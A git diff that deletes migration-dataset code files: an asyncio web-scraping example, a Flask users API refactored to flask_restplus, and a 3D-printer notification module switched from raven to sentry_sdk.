;) -+ -+ tasks = [] -+ for n in range(150, 160): -+ tasks.append((n, asyncio.create_task(get_html(n)))) -+ -+ for n, t in tasks: -+ html = await t - title = get_title(html, n) - print(Fore.WHITE + f"Title found: {title}", flush=True) - diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.source.py deleted file mode 100644 index ac733a9..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.source.py +++ /dev/null @@ -1,40 +0,0 @@ -import requests -import bs4 -from colorama import Fore - - -def get_html(episode_number: int) -> str: - print(Fore.YELLOW + f"Getting HTML for episode {episode_number}", flush=True) - - url = f'https://talkpython.fm/{episode_number}' - resp = requests.get(url) - resp.raise_for_status() - - return resp.text - - -def get_title(html: str, episode_number: int) -> str: - print(Fore.CYAN + f"Getting TITLE for episode {episode_number}", flush=True) - soup = bs4.BeautifulSoup(html, 'html.parser') - header = soup.select_one('h1') - if not header: - return "MISSING" - - return header.text.strip() - - -def main(): - get_title_range() - print("Done.") - - -def get_title_range(): - # Please keep this range pretty small to not DDoS my site. ;) - for n in range(150, 170): - html = get_html(n) - title = get_title(html, n) - print(Fore.WHITE + f"Title found: {title}", flush=True) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.target.py deleted file mode 100644 index 275fccd..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.target.py +++ /dev/null @@ -1,58 +0,0 @@ -import asyncio - -import aiohttp -import bs4 -from colorama import Fore - - -async def get_html(episode_number: int) -> str: - print(Fore.YELLOW + f"Getting HTML for episode {episode_number}", flush=True) - - url = f'https://talkpython.fm/{episode_number}' - - async with aiohttp.ClientSession() as session: - async with session.get(url) as resp: - resp.raise_for_status() - - return await resp.text() - - -def get_title(html: str, episode_number: int) -> str: - print(Fore.CYAN + f"Getting TITLE for episode {episode_number}", flush=True) - soup = bs4.BeautifulSoup(html, 'html.parser') - header = soup.select_one('h1') - if not header: - return "MISSING" - - return header.text.strip() - - -def main(): - loop = asyncio.get_event_loop() - loop.run_until_complete(get_title_range()) - print("Done.") - - -async def get_title_range_old_version(): - # Please keep this range pretty small to not DDoS my site. ;) - for n in range(150, 160): - html = await get_html(n) - title = get_title(html, n) - print(Fore.WHITE + f"Title found: {title}", flush=True) - - -async def get_title_range(): - # Please keep this range pretty small to not DDoS my site. 
;) - - tasks = [] - for n in range(150, 160): - tasks.append((n, asyncio.create_task(get_html(n)))) - - for n, t in tasks: - html = await t - title = get_title(html, n) - print(Fore.WHITE + f"Title found: {title}", flush=True) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.diff b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.diff deleted file mode 100644 index 49bda0e..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.diff +++ /dev/null @@ -1,25 +0,0 @@ -diff --git a/services/users/project/api/ping.py b/services/users/project/api/ping.py - index e1a19f2f7896acaa0aa00d85f6370aa40c77bb6f..d4119a0f609b151df99b2250e419c168e688a0c6 100644 - --- a/services/users/project/api/ping.py - +++ b/services/users/project/api/ping.py -@@ -1,11 +1,9 @@ --# project/api/ping.py -+# services/users/project/api/ping.py - - --from flask import Blueprint --from flask_restful import Api, Resource -+from flask_restplus import Namespace, Resource - --ping_blueprint = Blueprint("ping", __name__) --api = Api(ping_blueprint) -+ping_namespace = Namespace("ping") - - - class Ping(Resource): -@@ -13,4 +11,4 @@ class Ping(Resource): - return {"status": "success", "message": "pong!"} - - --api.add_resource(Ping, "/ping") -+ping_namespace.add_resource(Ping, "") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.source.py b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.source.py deleted file mode 100644 index d935014..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.source.py +++ /dev/null @@ -1,16 +0,0 @@ -# project/api/ping.py - - -from flask import Blueprint -from flask_restful import Api, Resource - -ping_blueprint = Blueprint("ping", __name__) -api = Api(ping_blueprint) - - -class Ping(Resource): - def get(self): - return {"status": "success", "message": "pong!"} - - -api.add_resource(Ping, "/ping") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.target.py b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.target.py deleted file mode 100644 index 8113470..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.target.py +++ /dev/null @@ -1,14 +0,0 @@ -# services/users/project/api/ping.py - - -from flask_restplus import Namespace, Resource - -ping_namespace = Namespace("ping") - - -class Ping(Resource): - def get(self): - return {"status": "success", "message": "pong!"} - - -ping_namespace.add_resource(Ping, "") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.diff b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.diff deleted file mode 100644 index 64007f9..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.diff +++ /dev/null @@ -1,190 +0,0 @@ -diff --git a/services/users/project/api/users/views.py b/services/users/project/api/users/views.py - index e1a19f2f7896acaa0aa00d85f6370aa40c77bb6f..d4119a0f609b151df99b2250e419c168e688a0c6 100644 - --- a/services/users/project/api/users/views.py - +++ b/services/users/project/api/users/views.py -@@ -1,113 +1,97 @@ --# 
project/api/users/views.py -+# services/users/project/api/users/views.py - - --from flask import Blueprint, request --from flask_restful import Api, Resource --from sqlalchemy import exc -+from flask import request -+from flask_restplus import Resource, fields, Namespace - --from project import db --from project.api.users.models import User -+from project.api.users.services import ( -+ get_all_users, -+ get_user_by_email, -+ add_user, -+ get_user_by_id, -+ update_user, -+ delete_user, -+) - --users_blueprint = Blueprint("users", __name__) --api = Api(users_blueprint) -+ -+users_namespace = Namespace("users") -+ -+user = users_namespace.model( -+ "User", -+ { -+ "id": fields.Integer(readOnly=True), -+ "username": fields.String(required=True), -+ "email": fields.String(required=True), -+ "created_date": fields.DateTime, -+ }, -+) - - - class UsersList(Resource): -+ @users_namespace.marshal_with(user, as_list=True) - def get(self): -- response_object = { -- "status": "success", -- "data": {"users": [user.to_json() for user in User.query.all()]}, -- } -- return response_object, 200 -+ """Returns all users.""" -+ return get_all_users(), 200 - -+ @users_namespace.expect(user, validate=True) -+ @users_namespace.response(201, " was added!") -+ @users_namespace.response(400, "Sorry. That email already exists.") - def post(self): -+ """Creates a new user.""" - post_data = request.get_json() -- response_object = {"status": "fail", "message": "Invalid payload."} -- if not post_data: -- return response_object, 400 - username = post_data.get("username") - email = post_data.get("email") -- password = post_data.get("password") -- try: -- user = User.query.filter_by(email=email).first() -- if not user: -- db.session.add(User(username=username, email=email, password=password)) -- db.session.commit() -- response_object["status"] = "success" -- response_object["message"] = f"{email} was added!" -- return response_object, 201 -- else: -- response_object["message"] = "Sorry. That email already exists." -- return response_object, 400 -- except exc.IntegrityError: -- db.session.rollback() -- return response_object, 400 -- except (exc.IntegrityError, ValueError): -- db.session.rollback() -+ response_object = {} -+ -+ user = get_user_by_email(email) -+ if user: -+ response_object["message"] = "Sorry. That email already exists." - return response_object, 400 -+ add_user(username, email) -+ response_object["message"] = f"{email} was added!" 
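-+ # Persistence now goes through the service layer (get_user_by_email/add_user)
-+ # instead of manipulating the SQLAlchemy session inside the view.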
-+ return response_object, 201 - - - class Users(Resource): -+ @users_namespace.marshal_with(user) -+ @users_namespace.response(200, "Success") -+ @users_namespace.response(404, "User does not exist") - def get(self, user_id): -- response_object = {"status": "fail", "message": "User does not exist"} -- try: -- user = User.query.filter_by(id=int(user_id)).first() -- if not user: -- return response_object, 404 -- else: -- response_object = { -- "status": "success", -- "data": { -- "id": user.id, -- "username": user.username, -- "email": user.email, -- "active": user.active, -- }, -- } -- return response_object, 200 -- except ValueError: -- return response_object, 404 -+ """Returns a single user.""" -+ user = get_user_by_id(user_id) -+ if not user: -+ users_namespace.abort(404, f"User {user_id} does not exist") -+ return user, 200 - -+ @users_namespace.expect(user, validate=True) -+ @users_namespace.response(200, " was updated!") -+ @users_namespace.response(404, "User does not exist") - def put(self, user_id): -+ """Updates a user.""" - post_data = request.get_json() -- response_object = {"status": "fail", "message": "Invalid payload."} -- if not post_data: -- return response_object, 400 - username = post_data.get("username") - email = post_data.get("email") -- if not username or not email: -- return response_object, 400 -- try: -- user = User.query.filter_by(id=int(user_id)).first() -- if user: -- user.username = username -- user.email = email -- db.session.commit() -- response_object["status"] = "success" -- response_object["message"] = f"{user.id} was updated!" -- return response_object, 200 -- else: -- response_object["message"] = "User does not exist." -- return response_object, 404 -- except exc.IntegrityError: -- db.session.rollback() -- return response_object, 400 -+ response_object = {} -+ -+ user = get_user_by_id(user_id) -+ if not user: -+ users_namespace.abort(404, f"User {user_id} does not exist") -+ update_user(user, username, email) -+ response_object["message"] = f"{user.id} was updated!" -+ return response_object, 200 - -+ @users_namespace.response(200, " was removed!") -+ @users_namespace.response(404, "User does not exist") - def delete(self, user_id): -- response_object = {"status": "fail", "message": "User does not exist"} -- try: -- user = User.query.filter_by(id=int(user_id)).first() -- if not user: -- return response_object, 404 -- else: -- db.session.delete(user) -- db.session.commit() -- response_object["status"] = "success" -- response_object["message"] = f"{user.email} was removed!" -- return response_object, 200 -- except ValueError: -- return response_object, 404 -- -- --api.add_resource(UsersList, "/users") --api.add_resource(Users, "/users/") -+ """Updates a user.""" -+ response_object = {} -+ user = get_user_by_id(user_id) -+ if not user: -+ users_namespace.abort(404, f"User {user_id} does not exist") -+ delete_user(user) -+ response_object["message"] = f"{user.email} was removed!" 
-+ return response_object, 200 -+ -+ -+users_namespace.add_resource(UsersList, "") -+users_namespace.add_resource(Users, "/") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.source.py b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.source.py deleted file mode 100644 index 72d5530..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.source.py +++ /dev/null @@ -1,113 +0,0 @@ -# project/api/users/views.py - - -from flask import Blueprint, request -from flask_restful import Api, Resource -from sqlalchemy import exc - -from project import db -from project.api.users.models import User - -users_blueprint = Blueprint("users", __name__) -api = Api(users_blueprint) - - -class UsersList(Resource): - def get(self): - response_object = { - "status": "success", - "data": {"users": [user.to_json() for user in User.query.all()]}, - } - return response_object, 200 - - def post(self): - post_data = request.get_json() - response_object = {"status": "fail", "message": "Invalid payload."} - if not post_data: - return response_object, 400 - username = post_data.get("username") - email = post_data.get("email") - password = post_data.get("password") - try: - user = User.query.filter_by(email=email).first() - if not user: - db.session.add(User(username=username, email=email, password=password)) - db.session.commit() - response_object["status"] = "success" - response_object["message"] = f"{email} was added!" - return response_object, 201 - else: - response_object["message"] = "Sorry. That email already exists." - return response_object, 400 - except exc.IntegrityError: - db.session.rollback() - return response_object, 400 - except (exc.IntegrityError, ValueError): - db.session.rollback() - return response_object, 400 - - -class Users(Resource): - def get(self, user_id): - response_object = {"status": "fail", "message": "User does not exist"} - try: - user = User.query.filter_by(id=int(user_id)).first() - if not user: - return response_object, 404 - else: - response_object = { - "status": "success", - "data": { - "id": user.id, - "username": user.username, - "email": user.email, - "active": user.active, - }, - } - return response_object, 200 - except ValueError: - return response_object, 404 - - def put(self, user_id): - post_data = request.get_json() - response_object = {"status": "fail", "message": "Invalid payload."} - if not post_data: - return response_object, 400 - username = post_data.get("username") - email = post_data.get("email") - if not username or not email: - return response_object, 400 - try: - user = User.query.filter_by(id=int(user_id)).first() - if user: - user.username = username - user.email = email - db.session.commit() - response_object["status"] = "success" - response_object["message"] = f"{user.id} was updated!" - return response_object, 200 - else: - response_object["message"] = "User does not exist." - return response_object, 404 - except exc.IntegrityError: - db.session.rollback() - return response_object, 400 - - def delete(self, user_id): - response_object = {"status": "fail", "message": "User does not exist"} - try: - user = User.query.filter_by(id=int(user_id)).first() - if not user: - return response_object, 404 - else: - db.session.delete(user) - db.session.commit() - response_object["status"] = "success" - response_object["message"] = f"{user.email} was removed!" 
- return response_object, 200 - except ValueError: - return response_object, 404 - - -api.add_resource(UsersList, "/users") -api.add_resource(Users, "/users/") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.target.py b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.target.py deleted file mode 100644 index 2402859..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.target.py +++ /dev/null @@ -1,97 +0,0 @@ -# services/users/project/api/users/views.py - - -from flask import request -from flask_restplus import Resource, fields, Namespace - -from project.api.users.services import ( - get_all_users, - get_user_by_email, - add_user, - get_user_by_id, - update_user, - delete_user, -) - - -users_namespace = Namespace("users") - -user = users_namespace.model( - "User", - { - "id": fields.Integer(readOnly=True), - "username": fields.String(required=True), - "email": fields.String(required=True), - "created_date": fields.DateTime, - }, -) - - -class UsersList(Resource): - @users_namespace.marshal_with(user, as_list=True) - def get(self): - """Returns all users.""" - return get_all_users(), 200 - - @users_namespace.expect(user, validate=True) - @users_namespace.response(201, " was added!") - @users_namespace.response(400, "Sorry. That email already exists.") - def post(self): - """Creates a new user.""" - post_data = request.get_json() - username = post_data.get("username") - email = post_data.get("email") - response_object = {} - - user = get_user_by_email(email) - if user: - response_object["message"] = "Sorry. That email already exists." - return response_object, 400 - add_user(username, email) - response_object["message"] = f"{email} was added!" - return response_object, 201 - - -class Users(Resource): - @users_namespace.marshal_with(user) - @users_namespace.response(200, "Success") - @users_namespace.response(404, "User does not exist") - def get(self, user_id): - """Returns a single user.""" - user = get_user_by_id(user_id) - if not user: - users_namespace.abort(404, f"User {user_id} does not exist") - return user, 200 - - @users_namespace.expect(user, validate=True) - @users_namespace.response(200, " was updated!") - @users_namespace.response(404, "User does not exist") - def put(self, user_id): - """Updates a user.""" - post_data = request.get_json() - username = post_data.get("username") - email = post_data.get("email") - response_object = {} - - user = get_user_by_id(user_id) - if not user: - users_namespace.abort(404, f"User {user_id} does not exist") - update_user(user, username, email) - response_object["message"] = f"{user.id} was updated!" - return response_object, 200 - - @users_namespace.response(200, " was removed!") - @users_namespace.response(404, "User does not exist") - def delete(self, user_id): - """Updates a user.""" - response_object = {} - user = get_user_by_id(user_id) - if not user: - users_namespace.abort(404, f"User {user_id} does not exist") - delete_user(user) - response_object["message"] = f"{user.email} was removed!" 
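- # NB: the docstring above reads "Updates a user." although this handler deletes
- # one; it appears to have been copied from put() in the original file.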
- return response_object, 200 - - -users_namespace.add_resource(UsersList, "") -users_namespace.add_resource(Users, "/") diff --git a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.diff b/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.diff deleted file mode 100644 index d9eca03..0000000 --- a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.diff +++ /dev/null @@ -1,78 +0,0 @@ -diff --git a/web/app/notifications.py b/web/app/notifications.py - index 9f586b7684f78d9cf0d1ab8e4f465133d6212346..b86b375952cc3e965c32201caa8094998c56cde7 100644 - --- a/web/app/notifications.py - +++ b/web/app/notifications.py -@@ -10,7 +10,7 @@ import requests - import logging - from urllib.parse import urlparse - import ipaddress --from raven.contrib.django.raven_compat.models import client as sentryClient -+from sentry_sdk import capture_exception - import smtplib - import backoff - -@@ -41,29 +41,29 @@ def send_failure_alert(printer, is_warning=True, print_paused=False): - if printer.user.alert_by_email: - send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if printer.user.is_pro and printer.user.alert_by_sms: - send_failure_alert_sms(printer, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if printer.user.is_pro: - send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - - def send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused): -@@ -247,25 +247,25 @@ def send_print_notification(_print, extra_ctx={}): - if _print.printer.user.print_notification_by_email: - send_print_notification_email(_print, extra_ctx) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if _print.printer.user.print_notification_by_pushbullet: - send_print_notification_pushbullet(_print) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if _print.printer.user.print_notification_by_telegram: - send_print_notification_telegram(_print) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if _print.printer.user.is_pro: - send_print_notification_slack(_print) - except: -- sentryClient.captureException() -+ capture_exception() - - - def send_print_notification_email(_print, extra_ctx={}): diff --git a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.source.py b/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.source.py deleted file mode 100644 index c332eff..0000000 --- a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.source.py +++ /dev/null @@ -1,427 +0,0 @@ -from allauth.account.admin import EmailAddress -from django.template.loader import render_to_string, get_template -from django.core.mail import EmailMessage -from datetime import datetime, timedelta -from django.utils import timezone -from 
twilio.rest import Client -from django.conf import settings -from pushbullet import Pushbullet, PushbulletError, PushError -import requests -import logging -from urllib.parse import urlparse -import ipaddress -from raven.contrib.django.raven_compat.models import client as sentryClient -import smtplib -import backoff - -from lib.file_storage import save_file_obj -from lib.utils import save_print_snapshot, last_pic_of_print -from app.models import Printer, Print -from app.telegram_bot import send_notification as send_telegram_notification -from lib import site - -LOGGER = logging.getLogger(__name__) - - -def send_failure_alert(printer, is_warning=True, print_paused=False): - LOGGER.info(f'Printer {printer.user.id} {"smells fishy" if is_warning else "is probably failing"}. Sending Alerts') - if not printer.current_print: - LOGGER.warn(f'Trying to alert on printer without current print. printer_id: {printer.id}') - return - - (_, rotated_jpg_url) = save_print_snapshot( - printer.current_print, - last_pic_of_print(printer.current_print, 'tagged'), - unrotated_jpg_path=None, - rotated_jpg_path=f'snapshots/{printer.id}/{printer.current_print.id}/{str(timezone.now().timestamp())}_rotated.jpg') - - # Calls wrapped in individual try/except because anyone of them could fail, and we still want the flow to continue - - try: - if printer.user.alert_by_email: - send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused) - except: - sentryClient.captureException() - - try: - send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused) - except: - sentryClient.captureException() - - try: - send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused) - except: - sentryClient.captureException() - - try: - if printer.user.is_pro and printer.user.alert_by_sms: - send_failure_alert_sms(printer, is_warning, print_paused) - except: - sentryClient.captureException() - - try: - if printer.user.is_pro: - send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused) - except: - sentryClient.captureException() - - -def send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused): - if not settings.EMAIL_HOST: - LOGGER.warn("Email settings are missing. Ignored send requests") - return - - subject = 'Your print {} on {} {}.'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing') - - ctx = { - 'printer': printer, - 'print_paused': print_paused, - 'is_warning': is_warning, - 'view_link': site.build_full_url('/printers/'), - 'cancel_link': site.build_full_url('/prints/{}/cancel/'.format(printer.current_print_id)), - 'resume_link': site.build_full_url('/prints/{}/resume/'.format(printer.current_print_id)), - } - - send_email( - user=printer.user, - subject=subject, - mailing_list='alert', - template_path='email/failure_alert.html', - ctx=ctx, - img_url=rotated_jpg_url, - ) - - -def send_failure_alert_sms(printer, is_warning, print_paused): - if not settings.TWILIO_ENABLED: - LOGGER.warn("Twilio settings are missing. Ignored send requests") - return - - if not printer.user.sms_eligible(): - return - - to_number = printer.user.phone_country_code + printer.user.phone_number - - pausing_msg = '' - if print_paused: - pausing_msg = 'Printer is paused. ' - elif printer.action_on_failure == Printer.PAUSE and is_warning: - pausing_msg = 'Printer is NOT paused. ' - - msg = 'The Spaghetti Detective - Your print {} on {} {}. 
{}Go check it at: {}'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing', - pausing_msg, - site.build_full_url('/')) - - send_sms(msg, to_number) - - -def send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.has_valid_pushbullet_token(): - return - - pausing_msg = '' - if print_paused: - pausing_msg = 'Printer is paused.' - elif printer.action_on_failure == Printer.PAUSE and is_warning: - pausing_msg = 'Printer is NOT paused because The Detective is not very sure about it.' - - pb = Pushbullet(printer.user.pushbullet_access_token) - title = 'The Spaghetti Detective - Failure alert!' - - msg = 'Your print {} on {} {}.'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing') - link = site.build_full_url('/') - body = '{}\n{}\nGo check it at: {}'.format(msg, pausing_msg, link) - - try: - file_url = None - try: - file_url = rotated_jpg_url - if not ipaddress.ip_address(urlparse(file_url).hostname).is_global: - pb.upload_file(requests.get(file_url).content, 'Detected Failure.jpg') - except: - pass - - if file_url: - pb.push_file(file_url=file_url, file_name="Detected Failure.jpg", file_type="image/jpeg", body=body, title=title) - else: - pb.push_link(title, link, body) - except (PushError, PushbulletError) as e: - LOGGER.error(e) - - -def send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.telegram_chat_id: - return - - try: - photo = requests.get(rotated_jpg_url).content - except: - photo = None - - action = '' - button_list = ['more_info'] - if print_paused: - action = 'The print is paused.' - button_list = ['cancel', 'resume', 'do_not_ask', 'more_info'] - elif printer.action_on_failure == Printer.PAUSE and is_warning: - action = 'Printer is NOT paused because The Detective is not very sure about it.' - button_list = ['cancel', 'more_info'] - - notification_text = f"""Hi {printer.user.first_name or ''}, - -_The Spaghetti Detective_ spotted some suspicious activity on your printer *{printer.name}*. 
- -{action}""" - - try: - send_telegram_notification(printer, notification_text, photo, buttons=button_list) - except requests.ConnectionError as e: - LOGGER.error(e) - - -def send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.slack_access_token: - return - - req = requests.get( - url='https://slack.com/api/conversations.list', - params={ - 'token': printer.user.slack_access_token, - 'types': 'public_channel,private_channel' - }) - req.raise_for_status() - slack_channel_ids = [c['id'] for c in req.json()['channels'] if c['is_member']] - - for slack_channel_id in slack_channel_ids: - msg = { - "channel": slack_channel_id, - "blocks": [ - { - "type": "section", - "text": { - "type": "mrkdwn", - "text": f"*The Spaghetti Detective - Failure alert*\n\nYour print {printer.current_print.filename or ''} on {printer.name} {'smells fishy' if is_warning else 'is probably failing'}.\nThe printer is {'paused' if print_paused else 'NOT paused'}.\n<{site.build_full_url('/printers/')}|Check it out.>" - } - } - ] - } - try: - msg['blocks'].append( - { - "type": "image", - "image_url": rotated_jpg_url, - "alt_text": "Print snapshot" - } - ) - except: - pass - - req = requests.post( - url='https://slack.com/api/chat.postMessage', - headers={'Authorization': f'Bearer {printer.user.slack_access_token}'}, - json=msg - ) - req.raise_for_status() - - -def send_print_notification(_print, extra_ctx={}): - if _print.is_canceled(): - if not _print.printer.user.notify_on_canceled: - return - else: - if not _print.printer.user.notify_on_done: - return - - # Calls wrapped in individual try/except because anyone of them could fail, and we still want the flow to continue - - try: - if _print.printer.user.print_notification_by_email: - send_print_notification_email(_print, extra_ctx) - except: - sentryClient.captureException() - - try: - if _print.printer.user.print_notification_by_pushbullet: - send_print_notification_pushbullet(_print) - except: - sentryClient.captureException() - - try: - if _print.printer.user.print_notification_by_telegram: - send_print_notification_telegram(_print) - except: - sentryClient.captureException() - - try: - if _print.printer.user.is_pro: - send_print_notification_slack(_print) - except: - sentryClient.captureException() - - -def send_print_notification_email(_print, extra_ctx={}): - subject = f'{_print.filename} is canceled.' if _print.is_canceled() else f'🙌 {_print.filename} is ready.' - ctx = { - 'print': _print, - 'print_time': str(_print.ended_at() - _print.started_at).split('.')[0], - 'timelapse_link': site.build_full_url(f'/prints/{_print.id}/'), - } - ctx.update(extra_ctx) - send_email( - user=_print.printer.user, - subject=subject, - mailing_list='print_notification', - template_path='email/print_notification.html', - ctx=ctx, - img_url=_print.poster_url, - ) - - -def send_print_notification_telegram(_print): - if not _print.printer.user.telegram_chat_id: - return - - try: - photo = requests.get(_print.poster_url).content - except: - photo = None - - notification_text = f"""Hi {_print.printer.user.first_name or ''}, - -Your print job *{_print.filename}* {'has been canceled' if _print.is_canceled() else 'is done'} on printer {_print.printer.name}. 
-""" - try: - send_telegram_notification(_print.printer, notification_text, photo) - except requests.ConnectionError as e: - LOGGER.error(e) - - -def send_print_notification_pushbullet(_print): - if not _print.printer.user.has_valid_pushbullet_token(): - return - - pb = Pushbullet(_print.printer.user.pushbullet_access_token) - - title = 'The Spaghetti Detective - Print job notification' - link = site.build_full_url('/') - body = f"Your print job {_print.filename} {'has been canceled' if _print.is_canceled() else 'is done'} on printer {_print.printer.name}." - file_url = None - try: - file_url = _print.poster_url - if not ipaddress.ip_address(urlparse(file_url).hostname).is_global: - pb.upload_file(requests.get(file_url).content, 'Snapshot.jpg') - except: - pass - - try: - if file_url: - pb.push_file(file_url=file_url, file_name="Snapshot.jpg", file_type="image/jpeg", body=body, title=title) - else: - pb.push_link(title, link, body) - except (PushError, PushbulletError) as e: - LOGGER.error(e) - - -def send_print_notification_slack(_print): - if not _print.printer.user.slack_access_token: - return - - req = requests.get( - url='https://slack.com/api/conversations.list', - params={ - 'token': _print.user.slack_access_token, - 'types': 'public_channel,private_channel' - }) - req.raise_for_status() - slack_channel_ids = [c['id'] for c in req.json()['channels'] if c['is_member']] - - for slack_channel_id in slack_channel_ids: - msg = { - "channel": slack_channel_id, - "blocks": [ - { - "type": "section", - "text": { - "type": "mrkdwn", - "text": f"*The Spaghetti Detective - Print job notification*\n\n*G-Code*: {_print.filename} \n*Status*: {'Canceled' if _print.is_canceled() else 'Finished'}\n*Printer*: <{site.build_full_url('/printers/')}|{_print.printer.name}>" - } - } - ] - } - if _print.poster_url: - msg['blocks'].append( - { - "type": "image", - "image_url": _print.poster_url, - "alt_text": "Print snapshot" - } - ) - - req = requests.post( - url='https://slack.com/api/chat.postMessage', - headers={'Authorization': f'Bearer {_print.user.slack_access_token}'}, - json=msg - ) - req.raise_for_status() - - -# Helpers -@backoff.on_exception(backoff.expo, - (smtplib.SMTPServerDisconnected, - smtplib.SMTPSenderRefused, - smtplib.SMTPResponseException,), - max_tries=3) -def send_email(user, subject, mailing_list, template_path, ctx, img_url=None, verified_only=True, attachment=None): - if not settings.EMAIL_HOST: - LOGGER.warn("Email settings are missing. 
Ignored send requests") - return - - attachments = [] - if img_url: - # https://github.com/TheSpaghettiDetective/TheSpaghettiDetective/issues/43 - try: - if not ipaddress.ip_address(urlparse(img_url).hostname).is_global: - attachments = [('Image.jpg', requests.get(img_url).content, 'image/jpeg')] - except: - pass - - ctx['img_url'] = None if attachments else img_url - - # By default email verification should be required for notifications but - # maybe users will want to disable it on private servers - if settings.ACCOUNT_EMAIL_VERIFICATION != 'none' and verified_only: - emails = EmailAddress.objects.filter(user=user, verified=True) - else: - emails = EmailAddress.objects.filter(user=user) - - unsub_url = site.build_full_url(f'/unsubscribe_email/?unsub_token={user.unsub_token}&list={mailing_list}') - for email in emails: - ctx['unsub_url'] = unsub_url - message = get_template(template_path).render(ctx) - msg = EmailMessage( - subject, - message, - to=(email.email,), - from_email=settings.DEFAULT_FROM_EMAIL, - attachments=attachments, - headers={'List-Unsubscribe': f'<{unsub_url}>, '},) - msg.content_subtype = 'html' - if attachment: - msg.attach_file(attachment) - msg.send() - - -def send_sms(msg, to_number): - twilio_client = Client(settings.TWILIO_ACCOUNT_SID, settings.TWILIO_AUTH_TOKEN) - from_number = settings.TWILIO_FROM_NUMBER - - twilio_client.messages.create(body=msg, to=to_number, from_=from_number) diff --git a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.target.py b/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.target.py deleted file mode 100644 index a7cb52d..0000000 --- a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.target.py +++ /dev/null @@ -1,427 +0,0 @@ -from allauth.account.admin import EmailAddress -from django.template.loader import render_to_string, get_template -from django.core.mail import EmailMessage -from datetime import datetime, timedelta -from django.utils import timezone -from twilio.rest import Client -from django.conf import settings -from pushbullet import Pushbullet, PushbulletError, PushError -import requests -import logging -from urllib.parse import urlparse -import ipaddress -from sentry_sdk import capture_exception -import smtplib -import backoff - -from lib.file_storage import save_file_obj -from lib.utils import save_print_snapshot, last_pic_of_print -from app.models import Printer, Print -from app.telegram_bot import send_notification as send_telegram_notification -from lib import site - -LOGGER = logging.getLogger(__name__) - - -def 